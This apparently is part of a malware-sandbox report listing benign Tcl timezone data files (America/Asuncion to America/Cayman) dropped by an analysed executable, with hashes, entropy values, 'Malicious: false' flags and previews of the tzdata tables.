Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Asuncion) {. {-9223372036854775808 -13840 0 LMT}. {-2524507760 -13840 0 AMT}. {-1206389360 -14400 0 PYT}. {86760000 -10800 0 PYT}. {134017200 -14400 0 PYT}. {162878400 -14400 0 PYT}. {181368000 -10800 1 PYST}. {194497200 -14400 0 PYT}. {212990400 -10800 1 PYST}. {226033200 -14400 0 PYT}. {244526400 -10800 1 PYST}. {257569200 -14400 0 PYT}. {276062400 -10800 1 PYST}. {291783600 -14400 0 PYT}. {307598400 -10800 1 PYST}. {323406000 -14400 0 PYT}. {339220800 -10800 1 PYST}. {354942000 -14400 0 PYT}. {370756800 -10800 1 PYST}. {386478000 -14400 0 PYT}. {402292800 -10800 1 PYST}. {418014000 -14400 0 PYT}. {433828800 -10800 1 PYST}. {449636400 -14400 0 PYT}. {465451200 -10800 1 PYST}. {481172400 -14400 0 PYT}. {496987200 -10800 1 PYST}. {512708400 -14400 0 PYT}. {528523200 -10800 1 PYST}. {544244400 -14400 0 PYT}. {560059200 -10800 1 PYS

C:\Users\user\Desktop\tcl\tzdata\America\Atikokan Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	332
Entropy (8bit):	4.582750266902939
Encrypted:	false
SSDEEP:	6:SlSWB9X5290/qlfbm2OHvcFGxYP329V/uFn/TUs/uFn/lHIs8/kRm5/uFb/C/iin:MBp5290/emdHLYP323/uFn/9/uFn/dBs
MD5:	66777BB05E04E030FABBC70649290851
SHA1:	97118A1C4561FC1CC9B7D18EE2C7D805778970B8
SHA-256:	2C6BBDE21C77163CD32465D773F6EBBA3332CA1EAEEF88BB95F1C98CBCA1562D
SHA-512:	B00F01A72A5306C71C30B1F0742E14E23202E03924887B2418CA6F5513AE59E12BC45F62B614716BBE50A7BEA8D62310E1B67BB39B84F7B1B40C5D2D19086B7C
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Atikokan) {. {-9223372036854775808 -21988 0 LMT}. {-2366733212 -21600 0 CST}. {-1632067200 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-923248800 -18000 1 CDT}. {-880214400 -18000 0 CWT}. {-769395600 -18000 1 CPT}. {-765388800 -18000 0 EST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Atka Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	172
Entropy (8bit):	4.761501750421919
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0/yO5pVAIg20/yOvYvt2IAcGE/ol7x+IAcGE/yOun:SlSWB9IZaM3y7/ykVAIgp/y9F290/ola
MD5:	E641C6615E1EF015427202803761AADD
SHA1:	E254129517335E60D82DFE00C6D5AF722D36565A
SHA-256:	9C546927B107BB4AB345F618A91C0F8C03D8A366028B2F0FCBF0A3CE29E6588E
SHA-512:	B7D34B1EA0D6722D7BFCD91F082D79EE009B97A2B5684D76A3F04CB59079637134275CF9A0306B9F4423A03CC0C2AB43994207D1B209161C893C2C6F3F3B6311
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Adak)]} {. LoadTimeZoneFile America/Adak.}.set TZData(:America/Atka) $TZData(:America/Adak).

C:\Users\user\Desktop\tcl\tzdata\America\Bahia Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1974
Entropy (8bit):	3.912191186217954
Encrypted:	false
SSDEEP:	48:5CP+Ih+j+R+u+W+iW+M+A+r+hN+gU+Wt+x3+XG+M+Y+v+c+M+/2+v+ux+/+C+jZl:MP+2+j+R+u+W+L+M+A+r+L+v+Wt+h+25
MD5:	6D2CD468DF52E8CA7B1B5578DE0B04C5
SHA1:	AEC04A61823815EF0414E8A88C860F0BDB6F3190
SHA-256:	BF7A9E732483DD1D3C7246B422A5B4CF3F496B001B70D60A9F510D84F14D9DDC
SHA-512:	248520173EFFBD49506095AD7F9E4BC6B7D819187EEF2BD39A5F94AC92D8C8F26647BEBAFF5C9802ECA300CBF6BCCDD9D2E05E998457D7357238B89FA76A338B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Bahia) {. {-9223372036854775808 -9244 0 LMT}. {-1767216356 -10800 0 BRT}. {-1206957600 -7200 1 BRST}. {-1191362400 -10800 0 BRT}. {-1175374800 -7200 1 BRST}. {-1159826400 -10800 0 BRT}. {-633819600 -7200 1 BRST}. {-622069200 -10800 0 BRT}. {-602283600 -7200 1 BRST}. {-591832800 -10800 0 BRT}. {-570747600 -7200 1 BRST}. {-560210400 -10800 0 BRT}. {-539125200 -7200 1 BRST}. {-531352800 -10800 0 BRT}. {-191365200 -7200 1 BRST}. {-184197600 -10800 0 BRT}. {-155163600 -7200 1 BRST}. {-150069600 -10800 0 BRT}. {-128898000 -7200 1 BRST}. {-121125600 -10800 0 BRT}. {-99954000 -7200 1 BRST}. {-89589600 -10800 0 BRT}. {-68418000 -7200 1 BRST}. {-57967200 -10800 0 BRT}. {499748400 -7200 1 BRST}. {511236000 -10800 0 BRT}. {530593200 -7200 1 BRST}. {540266400 -10800 0 BRT}. {562129200 -7200 1 BRST}. {571197600 -10800 0 BRT}. {592974000 -7200 1

C:\Users\user\Desktop\tcl\tzdata\America\Bahia_Banderas Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6625
Entropy (8bit):	3.791871111929614
Encrypted:	false
SSDEEP:	192:NqZL/1dCYDXEaXTuXMEXiH4RxGIJkYWXsWwav7jNf4sOVEmbwBlhcCLfYkNRfsNz:NqZL/1dCYDDCxyH4RxGIJkYWXsWwav7S
MD5:	6A18936EC3AA0FCEC8A230ADAF90FF1E
SHA1:	B13B8BF1FD2EEED44F63A0DC71F0BCE8AC15C783
SHA-256:	974481F867DEA51B6D8C6C21432F9F6F7D6A951EC1C34B49D5445305A6FB29B7
SHA-512:	75AA7A3AE63ED41AFF6CF0F6DC3CA649786A86A64293E715962B003383D31A8AD2B99C72CE6B788EC4DFF1AF7820F011B3F1FD353B37C326EF02289CE4A061BF
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Bahia_Banderas) {. {-9223372036854775808 -25260 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {-873828000 -25200 0 MST}. {-661539600 -28800 0 PST}. {28800 -25200 0 MST}. {828867600 -21600 1 MDT}. {846403200 -25200 0 MST}. {860317200 -21600 1 MDT}. {877852800 -25200 0 MST}. {891766800 -21600 1 MDT}. {909302400 -25200 0 MST}. {923216400 -21600 1 MDT}. {941356800 -25200 0 MST}. {954666000 -21600 1 MDT}. {972806400 -25200 0 MST}. {989139600 -21600 1 MDT}. {1001836800 -25200 0 MST}. {1018170000 -21600 1 MDT}. {1035705600 -25200 0 MST}. {1049619600 -21600 1 MDT}. {1067155200 -25200 0 MST}. {1081069200 -21600 1 MDT}. {1099209600 -25200 0 MST}. {1112518800 -21600 1 MDT}. {1130659200 -25200 0 MST}. {1143968400 -

C:\Users\user\Desktop\tcl\tzdata\America\Barbados Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	413
Entropy (8bit):	4.429320498710922
Encrypted:	false
SSDEEP:	12:MBp5290eNJmdH9Gcvm/uFkCFP/K/uFkCFks/v/h/uFkCFFoI/qZ/uFkCF3dX/r:cQT7enmSkC9/KSkCT/BSkCLl/wSkCj/r
MD5:	49EED111AB16F289E7D2D145A2641720
SHA1:	2F0A37524209FC26421C2951F169B4352250ED9E
SHA-256:	E7415944397EF395DDBD8EACB6D68662908A25E2DB18E4A3411016CBB6B8AFC6
SHA-512:	3AD4511798BA763C4E4A549340C807FE2FDF6B107C74A977E425734BBADDFF44ADAA68B5AE1F96170902A10208BC4BBF551C596EB1A3E292071549B8F3012A35
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Barbados) {. {-9223372036854775808 -14309 0 LMT}. {-1451678491 -14309 0 BMT}. {-1199217691 -14400 0 AST}. {234943200 -10800 1 ADT}. {244616400 -14400 0 AST}. {261554400 -10800 1 ADT}. {276066000 -14400 0 AST}. {293004000 -10800 1 ADT}. {307515600 -14400 0 AST}. {325058400 -10800 1 ADT}. {338706000 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Belem Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1010
Entropy (8bit):	4.083219722112219
Encrypted:	false
SSDEEP:	24:cQYe3gqc+Ih+j+Dd+HO+W+iW+M+A+ph+h/1+ge5+Wt+x3+p+C:5VgP+Ih+j+R+u+W+iW+M+A+r+hN+gU+O
MD5:	AA9BD809DCA209AFDF0D57752F6871F6
SHA1:	7C05A9FC831584CB5B9082073284736D000E9D5D
SHA-256:	4E8AC6FCDBC60264962D43B734A760A307C5E30D35A196289FDA8C87FC023B5C
SHA-512:	47AB548EBF090CAE6E59464A7AC9348F0F505E9B7EB3DED24EB7C7F11BA6EB92BDDC3F99E4B7C77046C82B54D7FC4D44996D46869DA3BD326FD25944A492DFA7
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Belem) {. {-9223372036854775808 -11636 0 LMT}. {-1767213964 -10800 0 BRT}. {-1206957600 -7200 1 BRST}. {-1191362400 -10800 0 BRT}. {-1175374800 -7200 1 BRST}. {-1159826400 -10800 0 BRT}. {-633819600 -7200 1 BRST}. {-622069200 -10800 0 BRT}. {-602283600 -7200 1 BRST}. {-591832800 -10800 0 BRT}. {-570747600 -7200 1 BRST}. {-560210400 -10800 0 BRT}. {-539125200 -7200 1 BRST}. {-531352800 -10800 0 BRT}. {-191365200 -7200 1 BRST}. {-184197600 -10800 0 BRT}. {-155163600 -7200 1 BRST}. {-150069600 -10800 0 BRT}. {-128898000 -7200 1 BRST}. {-121125600 -10800 0 BRT}. {-99954000 -7200 1 BRST}. {-89589600 -10800 0 BRT}. {-68418000 -7200 1 BRST}. {-57967200 -10800 0 BRT}. {499748400 -7200 1 BRST}. {511236000 -10800 0 BRT}. {530593200 -7200 1 BRST}. {540266400 -10800 0 BRT}. {562129200 -7200 1 BRST}. {571197600 -10800 0 BRT}. {590032800 -10800

C:\Users\user\Desktop\tcl\tzdata\America\Belize Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1829
Entropy (8bit):	3.9821437108187077
Encrypted:	false
SSDEEP:	48:5cmCSSTSnwoaUReqGtp4Hs7Ux8SJ8ltVDymDxUM/mjM/sQ:+mCSSTSnwoaUReqGtiHs7i8M8ltVDymt
MD5:	038937E745DFE0D09104C42545D49176
SHA1:	A453C663224F479A06AF655086D07E78672A5FAF
SHA-256:	762DF75CF9DA55B24834D6FB1BD33772F865365F86B8B7BE03520481CFA96C2F
SHA-512:	13464DB9200232B1C0B7F86DCD6650EB2BAAFF6097E9D269660706DFC3B7E5FFF6707BC6C7089D521566DC20CADE07AD3F3A570BBE2D702F95D476CB7EFF33F0
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Belize) {. {-9223372036854775808 -21168 0 LMT}. {-1822500432 -21600 0 CST}. {-1616954400 -19800 1 CHDT}. {-1606069800 -21600 0 CST}. {-1585504800 -19800 1 CHDT}. {-1574015400 -21600 0 CST}. {-1554055200 -19800 1 CHDT}. {-1542565800 -21600 0 CST}. {-1522605600 -19800 1 CHDT}. {-1511116200 -21600 0 CST}. {-1490551200 -19800 1 CHDT}. {-1479666600 -21600 0 CST}. {-1459101600 -19800 1 CHDT}. {-1448217000 -21600 0 CST}. {-1427652000 -19800 1 CHDT}. {-1416162600 -21600 0 CST}. {-1396202400 -19800 1 CHDT}. {-1384713000 -21600 0 CST}. {-1364752800 -19800 1 CHDT}. {-1353263400 -21600 0 CST}. {-1333303200 -19800 1 CHDT}. {-1321813800 -21600 0 CST}. {-1301248800 -19800 1 CHDT}. {-1290364200 -21600 0 CST}. {-1269799200 -19800 1 CHDT}. {-1258914600 -21600 0 CST}. {-1238349600 -19800 1 CHDT}. {-1226860200 -21600 0 CST}. {-1206900000 -19800 1 CHDT}.

C:\Users\user\Desktop\tcl\tzdata\America\Blanc-Sablon Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	331
Entropy (8bit):	4.599775510303771
Encrypted:	false
SSDEEP:	6:SlSWB9X5290Am2OHff4YPawmX/bVVFUFkCFVUP/GH6/XVVFUFkIZVVFUFkeF3k/g:MBp5290AmdHff4YPawY/b/uFkCFVUP/L
MD5:	5ACBD50E1CB87B4E7B735A8B5281917B
SHA1:	3E92C60B365C7E1F9BF5F312B007CBFD4175DB8F
SHA-256:	E61F3762B827971147772A01D51763A18CC5BED8F736000C64B4BDFF32973803
SHA-512:	9284FFDF115C7D7E548A06A6513E3591F88EE3E5197106B71B54CD82F27890D12773381218BCA69720F074A6762282F25830422DFA402FF19301D6834FD9FF7D
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Blanc-Sablon) {. {-9223372036854775808 -13708 0 LMT}. {-2713896692 -14400 0 AST}. {-1632074400 -10800 1 ADT}. {-1615143600 -14400 0 AST}. {-880221600 -10800 1 AWT}. {-769395600 -10800 1 APT}. {-765399600 -14400 0 AST}. {14400 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Boa_Vista Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1175
Entropy (8bit):	4.020601379816668
Encrypted:	false
SSDEEP:	24:cQETmexo6Skl7s/oySklTs/oiSklP/otHSkl8/oNOSkll/osSklGo/ooSklR/o9o:5Ea6SklVySklTpiSklo5Skl5oSklOsSs
MD5:	54138573741C384B92A8504C1A0D8EC2
SHA1:	BCA3C460ED0B2CB9E824186C768B15704EFB1739
SHA-256:	18DE58634803E9B6DFE5FC77B128E973FE3C93BC7C64648A2D7A9BCD20A3F7CB
SHA-512:	3E0ED239D4E5D58978C9F684E04E8B0AC2AFF55D2F75CB14051EDCDA358A3B1181C128BF82185B56C93E59B4C7CCCCD708AB876D83B306D3C0BB7A4BA6F3ECC4
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Boa_Vista) {. {-9223372036854775808 -14560 0 LMT}. {-1767211040 -14400 0 AMT}. {-1206954000 -10800 1 AMST}. {-1191358800 -14400 0 AMT}. {-1175371200 -10800 1 AMST}. {-1159822800 -14400 0 AMT}. {-633816000 -10800 1 AMST}. {-622065600 -14400 0 AMT}. {-602280000 -10800 1 AMST}. {-591829200 -14400 0 AMT}. {-570744000 -10800 1 AMST}. {-560206800 -14400 0 AMT}. {-539121600 -10800 1 AMST}. {-531349200 -14400 0 AMT}. {-191361600 -10800 1 AMST}. {-184194000 -14400 0 AMT}. {-155160000 -10800 1 AMST}. {-150066000 -14400 0 AMT}. {-128894400 -10800 1 AMST}. {-121122000 -14400 0 AMT}. {-99950400 -10800 1 AMST}. {-89586000 -14400 0 AMT}. {-68414400 -10800 1 AMST}. {-57963600 -14400 0 AMT}. {499752000 -10800 1 AMST}. {511239600 -14400 0 AMT}. {530596800 -10800 1 AMST}. {540270000 -14400 0 AMT}. {562132800 -10800 1 AMST}. {571201200 -14400 0 AMT}.

C:\Users\user\Desktop\tcl\tzdata\America\Bogota Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	238
Entropy (8bit):	4.746762201325416
Encrypted:	false
SSDEEP:	6:SlSWB9X5290bJqm2OHDgPcuknTEXPkTkR/uF1xEV/kW:MBp5290bUmdHDgPcukT8kTY/uFo/kW
MD5:	97B0317C40277D2C05783482B02285F8
SHA1:	D62F23B775A29AC6A27C308F9EF09890B863DBA3
SHA-256:	26D171F53573B67D0A6260246A58289615A932B998194A9CDC80325998AC27E0
SHA-512:	636A34DC7074D551035F78A8150DFC05096AC7CF3CC9796D65F939DC9AE22A04DB22F14180A7B5B8E00E84E8FA621794B226C9F5BACD3E83B5D5AF24EAEE37FF
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Bogota) {. {-9223372036854775808 -17776 0 LMT}. {-2707671824 -17776 0 BMT}. {-1739041424 -18000 0 COT}. {704869200 -14400 1 COST}. {733896000 -18000 0 COT}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Boise Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8324
Entropy (8bit):	3.772029913040983
Encrypted:	false
SSDEEP:	96:e45eG5cnWsGm+4I1zXN+C2mWBNQMsmNTxf6AeO+cblX:xGnWdVUC2mWBNwWTxyWR
MD5:	239425659E7345C757E6A44ABF258A22
SHA1:	9659217B4D55795333DFA5E08451B69D17F514AD
SHA-256:	6D6D377DDF237B1C5AB012DDDEB5F4FAA39D1D51240AA5C4C34EE96556D2D2F4
SHA-512:	3891D7BC1F84FF6B01B6C2DF6F0413C9E168E5B84CE445030F1B871766DD38B2FF7418501AB7C0DCEAB8381E538D65DF4E7708502EE924546A28DF1AC9BB7129
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Boise) {. {-9223372036854775808 -27889 0 LMT}. {-2717640000 -28800 0 PST}. {-1633269600 -25200 1 PDT}. {-1615129200 -28800 0 PST}. {-1601820000 -25200 1 PDT}. {-1583679600 -28800 0 PST}. {-1471788000 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-52930800 -21600 1 MDT}. {-37209600 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {9968400 -21600 1 MDT}. {25689600 -25200 0 MST}. {41418000 -21600 1 MDT}. {57744000 -25200 0 MST}. {73472400 -21600 1 MDT}. {89193600 -25200 0 MST}. {104922000 -21600 1 MDT}. {120643200 -25200 0 MST}. {126255600 -25200 0 MST}. {129114000 -21600 0 MDT}. {152092800 -25200 0 MST}. {162378000 -21600 1 MDT}. {183542400 -25200 0 MST}. {199270800 -21600 1 MDT}. {215596800 -25200 0 MST}. {2307

C:\Users\user\Desktop\tcl\tzdata\America\Buenos_Aires Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	234
Entropy (8bit):	4.775296176809929
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y7/MQA+zJFVAIgp/MQA+z2L290BFzk5h490/MQA+zq:MBaIMY/MV+z6p/MV+z2L290rzy490/Mz
MD5:	861DAA3C2FFF1D3E9F81FB5C63EA71F1
SHA1:	8E219E63E6D7E702FD0644543E05778CE786601A
SHA-256:	1D32F22CF50C7586CB566E45988CA05538E61A05DF09FD8F824D870717832307
SHA-512:	71B47C369DF1958C560E71B114616B999FB4B091FAA6DD203B29D2555FFE419D6FC5EF82FA810DC56E6F00722E13B03BFBED2516B4C5C2321F21E03F0198B91B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Buenos_Aires)]} {. LoadTimeZoneFile America/Argentina/Buenos_Aires.}.set TZData(:America/Buenos_Aires) $TZData(:America/Argentina/Buenos_Aires).

C:\Users\user\Desktop\tcl\tzdata\America\Cambridge_Bay Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7487
Entropy (8bit):	3.7913991050941216
Encrypted:	false
SSDEEP:	96:jGoGm+4ILQzXN+C2mWBNQMsmNTxf6AeO+cblX:+7YUC2mWBNwWTxyWR
MD5:	EA5C34D05D695102C33B25E919DDB4FB
SHA1:	1AE9BA64C31E9003D512612F6D18C8B506DB77B8
SHA-256:	631B1BE339315AAF7A800DC2C6754DADB8D95A9A6171277FE06E5D42C547DADF
SHA-512:	D888A87E1F3758B85EBDD47D9FD3A1E6EF85C190F8ACEEC73FD800B924B879BA40BFB23297C694B75E28F0BF46919582FF87DA9B6337FBEDEE58F4247936B8AC
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Cambridge_Bay) {. {-9223372036854775808 0 0 zzz}. {-1577923200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-147891600 -18000 1 MDDT}. {-131562000 -25200 0 MST}. {325674000 -21600 1 MDT}. {341395200 -25200 0 MST}. {357123600 -21600 1 MDT}. {372844800 -25200 0 MST}. {388573200 -21600 1 MDT}. {404899200 -25200 0 MST}. {420022800 -21600 1 MDT}. {436348800 -25200 0 MST}. {452077200 -21600 1 MDT}. {467798400 -25200 0 MST}. {483526800 -21600 1 MDT}. {499248000 -25200 0 MST}. {514976400 -21600 1 MDT}. {530697600 -25200 0 MST}. {544611600 -21600 1 MDT}. {562147200 -25200 0 MST}. {576061200 -21600 1 MDT}. {594201600 -25200 0 MST}. {607510800 -21600 1 MDT}. {625651200 -25200 0 MST}. {638960400 -21600 1 MDT}. {657100800 -25200 0 MST}. {671014800 -21600 1 MDT}. {688550400 -25200 0 MST}. {

C:\Users\user\Desktop\tcl\tzdata\America\Campo_Grande Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7778
Entropy (8bit):	3.7685935760913543
Encrypted:	false
SSDEEP:	192:b1M1w141C1f1t1m1B121C1+1u181u1g1c1m181Q1b171M13191H1L1w151J/1Y1v:R0AI6tzW/m6O+k+wEWkgRx0FDVBAXJNS
MD5:	AC1DCB2B548972B024CDCFA3068EB01C
SHA1:	FE26175E34E34D061728C7F90253DDB5E56328C1
SHA-256:	4512035C9DF32640CA78C287B4CE8D188CC400B3CC841EF2B030FBD7A5558670
SHA-512:	92B3241F59238ACCDEE819E06DEE8CD99C7CB1019109870304789EC9EFA430636F4A0870E79599E3E8FF5A5984B2661D3BBC5D88FDC0A77A79FA28B5477DCE19
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Campo_Grande) {. {-9223372036854775808 -13108 0 LMT}. {-1767212492 -14400 0 AMT}. {-1206954000 -10800 1 AMST}. {-1191358800 -14400 0 AMT}. {-1175371200 -10800 1 AMST}. {-1159822800 -14400 0 AMT}. {-633816000 -10800 1 AMST}. {-622065600 -14400 0 AMT}. {-602280000 -10800 1 AMST}. {-591829200 -14400 0 AMT}. {-570744000 -10800 1 AMST}. {-560206800 -14400 0 AMT}. {-539121600 -10800 1 AMST}. {-531349200 -14400 0 AMT}. {-191361600 -10800 1 AMST}. {-184194000 -14400 0 AMT}. {-155160000 -10800 1 AMST}. {-150066000 -14400 0 AMT}. {-128894400 -10800 1 AMST}. {-121122000 -14400 0 AMT}. {-99950400 -10800 1 AMST}. {-89586000 -14400 0 AMT}. {-68414400 -10800 1 AMST}. {-57963600 -14400 0 AMT}. {499752000 -10800 1 AMST}. {511239600 -14400 0 AMT}. {530596800 -10800 1 AMST}. {540270000 -14400 0 AMT}. {562132800 -10800 1 AMST}. {571201200 -14400 0 AMT}.

C:\Users\user\Desktop\tcl\tzdata\America\Cancun Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6435
Entropy (8bit):	3.7608837877562937
Encrypted:	false
SSDEEP:	192:GB+z6stuNEsRZjWqZL/1dCYDXEaXTuXMEXiH4RxGIJkYWXsWwav7jNf4sOVEmbwK:GB+z6stuNEsRZjWqZL/1dCYDDCxyH4RJ
MD5:	643DBC25906E245F5D6DB486A094B857
SHA1:	3B683B5C7A3E9A49F45076DCC0BFA48A2C0565EC
SHA-256:	8C7D8771386566B80325C0D19C964EA0F87CE244991DCDA2B0B2627EA9B0EAF5
SHA-512:	6CEEF8D8B4235CA0A67012DC40A5E1DF605075F1B3D5FE3E7D0CF70885459105A709DB43C71329A728DF5EA0125676F9A53AEF4EC449C404DA668837EECB8C1F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Cancun) {. {-9223372036854775808 -20824 0 LMT}. {-1514743200 -21600 0 CST}. {377935200 -18000 0 EST}. {828860400 -14400 1 EDT}. {846396000 -18000 0 EST}. {860310000 -14400 1 EDT}. {877845600 -18000 0 EST}. {891759600 -14400 1 EDT}. {902041200 -18000 0 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001833200 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000 -18000 1 CDT}. {1067151600 -21600 0 CST}. {1081065600 -18000 1 CDT}. {1099206000 -21600 0 CST}. {1112515200 -18000 1 CDT}. {1130655600 -21600 0 CST}. {1143964800 -18000 1 CDT}. {1162105200 -21600 0 CST}. {1175414400 -18000 1 CDT}. {1193554800 -21600 0 CST}. {1207468800 -18000 1 CDT}. {1225004400 -21600 0 CST}. {1238918400 -18000 1 CD

C:\Users\user\Desktop\tcl\tzdata\America\Caracas Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	240
Entropy (8bit):	4.74219167348714
Encrypted:	false
SSDEEP:	6:SlSWB9X52909+ET2m2OHXP8Hk4lvFVFlRUF/R/PvWnVVFlK:MBp5290QmdHXPy/ltvQFZ/3qVvc
MD5:	31DF35E1C8C7F133CE6A8E1B4BA143E6
SHA1:	20C9F10CB35E700BD64C6337D0FE2CAACAAB3BE4
SHA-256:	909D1CB75BBE1C3FDBD5DD96FA1E03C16990602009CBACE875B8DF84A47FCA3F
SHA-512:	32A4D3F384233E12CD393119A762B50C7CA9720B74927BA6699891C288249DF7FA7ECD464DDB59B966B7E5F55A7B73F330661E13D1CE41E6FA8841C5B4FE5665
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Caracas) {. {-9223372036854775808 -16064 0 LMT}. {-2524505536 -16060 0 CMT}. {-1826739140 -16200 0 VET}. {-157750200 -14400 0 VET}. {1197183600 -16200 0 VET}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Catamarca Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	222
Entropy (8bit):	4.615632762186706
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y7/MMXAIVAIgp/MMXs29094SXAFB5290/MMXAv:MBaIMY/Mhp/MP290mh5290/MH
MD5:	359226FA8A7EAFCA0851F658B4EBBCDC
SHA1:	611A24C24462DF5994B5D043E65770B778A6443B
SHA-256:	F2782781F1FB7FD12FF85D36BB244887D1C2AD52746456B3C3FEAC2A63EC2157
SHA-512:	6F9DD2D1662103EC5A34A8858BDFA69AC9F74D3337052AB47EA61DC4D76216886A0644CF1284940E8862A09CBA3E0A87784DFDB6414434C92E45004AAF312614
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Catamarca)]} {. LoadTimeZoneFile America/Argentina/Catamarca.}.set TZData(:America/Catamarca) $TZData(:America/Argentina/Catamarca).

C:\Users\user\Desktop\tcl\tzdata\America\Cayenne Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	178
Entropy (8bit):	4.877199904694429
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGE91pkXGm2OHEFvpoevUdR4FIUPveYKUwXvp3VVFVeYKn:SlSWB9X52909zm2OHEdGeG4v3w/ZVVFQ
MD5:	A755FF22FF28B7E23C7EB3A7AF02339A
SHA1:	16930549E0C2E913342256E40889A8A9DDE5D548
SHA-256:	9DB8D93A0D69ABB263D02D9FAC0A47F8CEAA7470E8FC2F47B62694BB1F0032A2
SHA-512:	7D4DEDCF3A606D233EFFF496D7FEE3604211C466540B3900C3D357186A4F0F28F3C63EFFF84C0A006FA97B64E5972FC5F2CD1B8C87BCD5FB639D7583635D2BAE
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Cayenne) {. {-9223372036854775808 -12560 0 LMT}. {-1846269040 -14400 0 GFT}. {-71092800 -10800 0 GFT}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Cayman Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	179
Entropy (8bit):	4.9217472988569995
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGE91mWkXGm2OHDsoevX5XWXvFxYvFadINVVvain:SlSWB9X52909YCm2OHDsoeP5XA3GxNVZ
MD5:	C7EC198621FB438688F6F0F7ED8C759C
SHA1:	D4AECEA3E04292B860EB7AC67E067CE1B6682AEE
SHA-256:	ED9617961D23A77AFA3D131EE21017EDF1A01D83B5EECE22A67AB47EFE355A27
SHA-512:	0A0463D28205EA1D43AD8E9C7D460636629F3B8403CD166C255A61BC0622CAEDC629147DF0EEEBCC3EC21EA49F7DC3D460AC99FF1F0ABE567280CD82320EFD95
